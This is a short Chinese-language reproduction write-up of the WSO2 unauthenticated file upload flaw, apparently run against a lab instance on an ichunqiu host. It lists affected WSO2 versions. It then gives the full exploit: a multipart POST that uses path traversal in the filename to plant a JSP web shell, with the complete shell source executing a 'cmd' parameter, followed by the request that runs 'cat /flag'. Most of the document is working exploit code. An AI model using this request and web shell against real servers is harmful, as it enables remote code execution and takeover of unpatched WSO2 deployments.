一、漏洞概述
WSO2文件上传漏洞允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
二、影响范围
WSO2 API Manager 2.2.0 and above
WSO2 Identity Server 5.2.0 and above
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0
WSO2 Identity Server as Key Manager 5.3.0 and above
WSO2 Enterprise Integrator 6.2.0 and above
三、访问页面
四、漏洞复现
1、上传恶意JSP文件
POST /fileupload/toolsAny HTTP/2
Host: eci-2zeebfpu72fvsie0gjeg.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 898
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"
<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--
2、访问上传的文件并执行命令
/authenticationendpoint/testshell.jsp?cmd=cat+%2Fflag